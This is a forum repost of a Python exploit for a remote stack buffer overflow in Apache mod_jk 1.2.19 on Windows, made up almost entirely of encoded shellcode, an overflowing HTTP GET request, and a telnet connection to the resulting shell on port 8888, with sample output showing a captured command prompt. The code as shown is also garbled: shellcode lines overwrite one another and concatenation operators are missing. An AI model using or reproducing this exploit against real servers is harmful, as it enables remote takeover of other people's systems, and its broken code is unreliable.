• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)

    发布者: 土豆服务器 | 发布时间: 2025-6-28 22:50| 查看数: 54| 评论数: 0|帖子模式

    #!/usr/bin/python
    #
    #   _____ _   _ _____  _____ _____ _____
    #  /  ___| |_| |  _  \|  _  |  _  |_   _|
    #  | (___|  _  | [_)_/| (_) | (_) | | |
    #  \_____|_| |_|_| |_||_____|_____| |_|
    #         C. H. R. O. O. T.  SECURITY  GROUP
    #         - -- ----- --- -- -- ---- --- -- -
    #                      http://www.chroot.org
    #
    #                          _   _ _ _____ ____ ____ __  _
    #        Hacks In Taiwan  | |_| | |_   _|  __|    |  \| |
    #        Conference 2008  |  _  | | | | | (__| () |     |
    #                         |_| |_|_| |_| \____|____|_|\__|
    #                                      http://www.hitcon.org
    #
    #
    #  Title =======:: Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit
    #
    #  Author ======:: unohope [at] chroot [dot] org
    #
    #  IRC =========:: irc.chroot.org #chroot
    #
    #  ScriptName ==:: Apache Module mod_jk/1.2.19
    #
    #  Vendor ======:: http://tomcat.apache.org/
    #
    #  Download ====:: http://archive.apache.org/dist/tomcat/tomcat-connectors/jk/binaries/win32/
    #
    #  Tested on ===:: Apache/2.0.58 (Win32) mod_jk/1.2.19
    #                  Apache/2.0.59 (Win32) mod_jk/1.2.19
    #
    #  Greets ======:: zha0
    #
    #
    #  [root@wargame tmp]# ./apx-jk_mod-1.2.19
    #  Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope@chroot.org)
    #
    #  usage: ./apx-jk_mod-1.2.19 <host>
    #
    #  [root@wargame tmp]# ./apx-jk_mod-1.2.19 192.168.1.78
    #  Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope@chroot.org)
    #
    #    [ ] connecting to 192.168.1.78 ...
    #
    #  Trying 192.168.1.78...
    #  Connected to 192.168.1.78.
    #  Escape character is '^]'.
    #  Microsoft Windows XP [.. 5.1.2600]
    #  (C) Copyright 1985-2001 Microsoft Corp.
    #
    #  C:\AppServ\Apache2>
    #
    #

    import os, sys, time
    from socket import *

    shellcode  = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
    shellcode  = "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x68"
    shellcode  = "\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x78\x42\x32\x42\x41\x32"
    shellcode  = "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4b\x59\x49\x6c\x43"
    shellcode  = "\x5a\x7a\x4b\x32\x6d\x5a\x48\x5a\x59\x69\x6f\x4b\x4f\x39\x6f\x71"
    shellcode  = "\x70\x6e\x6b\x62\x4c\x44\x64\x71\x34\x4c\x4b\x62\x65\x75\x6c\x4c"
    shellcode  = "\x4b\x63\x4c\x76\x65\x70\x78\x35\x51\x48\x6f\x6c\x4b\x50\x4f\x74"
    shellcode  = "\x58\x6e\x6b\x33\x6f\x55\x70\x37\x71\x48\x6b\x57\x39\x6c\x4b\x66"
    shellcode  = "\x54\x6e\x6b\x46\x61\x7a\x4e\x47\x41\x6b\x70\x7a\x39\x4c\x6c\x4c"
    shellcode  = "\x44\x6f\x30\x62\x54\x44\x47\x38\x41\x4b\x7a\x54\x4d\x44\x41\x4b"
    shellcode  = "\x72\x78\x6b\x39\x64\x35\x6b\x53\x64\x75\x74\x46\x48\x72\x55\x79"
    shellcode  = "\x75\x6c\x4b\x53\x6f\x76\x44\x44\x41\x48\x6b\x35\x36\x4e\x6b\x54"
    shellcode  = "\x4c\x30\x4b\x6c\x4b\x51\x4f\x65\x4c\x65\x51\x38\x6b\x77\x73\x36"
    shellcode  = "\x4c\x4e\x6b\x6e\x69\x30\x6c\x66\x44\x45\x4c\x30\x61\x69\x53\x30"
    shellcode  = "\x31\x79\x4b\x43\x54\x6c\x4b\x63\x73\x44\x70\x4e\x6b\x77\x30\x66"
    shellcode  = "\x6c\x6c\x4b\x72\x50\x45\x4c\x4c\x6d\x4e\x6b\x73\x70\x64\x48\x73"
    shellcode  = "\x6e\x55\x38\x6e\x6e\x32\x6e\x34\x4e\x58\x6c\x62\x70\x39\x6f\x6b"
    shellcode  = "\x66\x70\x66\x61\x43\x52\x46\x71\x78\x30\x33\x55\x62\x63\x58\x63"
    shellcode  = "\x47\x34\x33\x65\x62\x41\x4f\x30\x54\x39\x6f\x4a\x70\x52\x48\x5a"
    shellcode  = "\x6b\x38\x6d\x6b\x4c\x75\x6b\x30\x50\x6b\x4f\x6e\x36\x53\x6f\x6f"
    shellcode  = "\x79\x4a\x45\x32\x46\x6f\x71\x6a\x4d\x34\x48\x77\x72\x73\x65\x73"
    shellcode  = "\x5a\x37\x72\x69\x6f\x58\x50\x52\x48\x4e\x39\x76\x69\x4a\x55\x4c"
    shellcode  = "\x6d\x32\x77\x69\x6f\x59\x46\x50\x53\x43\x63\x41\x43\x70\x53\x70"
    shellcode  = "\x53\x43\x73\x50\x53\x62\x63\x70\x53\x79\x6f\x6a\x70\x35\x36\x61"
    shellcode  = "\x78\x71\x32\x78\x38\x71\x76\x30\x53\x4b\x39\x69\x71\x4d\x45\x33"
    shellcode  = "\x58\x6c\x64\x47\x6a\x74\x30\x5a\x67\x43\x67\x79\x6f\x39\x46\x32"
    shellcode  = "\x4a\x56\x70\x66\x31\x76\x35\x59\x6f\x58\x50\x32\x48\x4d\x74\x4e"
    shellcode  = "\x4d\x66\x4e\x7a\x49\x50\x57\x6b\x4f\x6e\x36\x46\x33\x56\x35\x39"
    shellcode  = "\x6f\x78\x50\x33\x58\x6b\x55\x51\x59\x4e\x66\x50\x49\x51\x47\x39"
    shellcode  = "\x6f\x48\x56\x32\x70\x32\x74\x62\x74\x46\x35\x4b\x4f\x38\x50\x6e"
    shellcode  = "\x73\x55\x38\x4d\x37\x71\x69\x69\x56\x71\x69\x61\x47\x6b\x4f\x6e"
    shellcode  = "\x36\x36\x35\x79\x6f\x6a\x70\x55\x36\x31\x7a\x71\x74\x32\x46\x51"
    shellcode  = "\x78\x52\x43\x70\x6d\x4f\x79\x4d\x35\x72\x4a\x66\x30\x42\x79\x64"
    shellcode  = "\x69\x7a\x6c\x4b\x39\x48\x67\x62\x4a\x57\x34\x4f\x79\x6d\x32\x37"
    shellcode  = "\x41\x6b\x70\x7a\x53\x6e\x4a\x69\x6e\x32\x62\x46\x4d\x6b\x4e\x70"
    shellcode  = "\x42\x44\x6c\x4c\x53\x6e\x6d\x31\x6a\x64\x78\x4c\x6b\x4e\x4b\x4e"
    shellcode  = "\x4b\x43\x58\x70\x72\x69\x6e\x6d\x63\x37\x66\x79\x6f\x63\x45\x73"
    shellcode  = "\x74\x4b\x4f\x7a\x76\x63\x6b\x31\x47\x72\x72\x41\x41\x50\x51\x61"
    shellcode  = "\x41\x70\x6a\x63\x31\x41\x41\x46\x31\x71\x45\x51\x41\x4b\x4f\x78"
    shellcode  = "\x50\x52\x48\x4c\x6d\x79\x49\x54\x45\x38\x4e\x53\x63\x6b\x4f\x6e"
    shellcode  = "\x36\x30\x6a\x49\x6f\x6b\x4f\x70\x37\x4b\x4f\x4e\x30\x4e\x6b\x30"
    shellcode  = "\x57\x69\x6c\x6b\x33\x4b\x74\x62\x44\x79\x6f\x6b\x66\x66\x32\x6b"
    shellcode  = "\x4f\x4e\x30\x53\x58\x58\x70\x4e\x6a\x55\x54\x41\x4f\x52\x73\x4b"
    shellcode  = "\x4f\x69\x46\x4b\x4f\x6e\x30\x68";

    foo_base = 8
    buf_base = 4087
    buf_offset = foo_base * 11
    nop = "\x90"
    ret = "\xcc\x2a\xd9\x77"
    buf = nop*foo_base   shellcode   nop*(buf_base - foo_base - len(shellcode) - buf_offset)   ret
    buf  = "\x90\x90\xb0\x53\x6b\xC0\x28\x03\xd8\xff\xd3"   nop*(buf_offset - foo_base - 3)

    def usage():
      print 'usage: %s <host>\n' % sys.argv[0]
      sys.exit(-1)

    def xpl():
      try:
        print len(buf)
        sockaddr = (host, 80)
        s = socket(AF_INET, SOCK_STREAM)
        s.connect(sockaddr)
        payload = buf   'HTTP/1.0\r\nHost: %s\r\n\r\n\0' % host
        s.send('GET /'   payload)
        s.close()
        print '  [ ] connecting to %s ...\n' % host
        time.sleep(3)
        os.system("telnet %s 8888" % host)
      except:
        print '  [-] EXPLOIT FAILED!\n'

    if __name__ == '__main__':
      print 'Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope [at] chroot.org)\n'
      try:
        host = sys.argv[1]
      except IndexError:
        usage()
      xpl()


    # [NOTE]
    #
    # !! This is just for educational purposes, DO NOT use for illegal. !!
    #



    来源:https://www.jb51.net/hack/5718.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表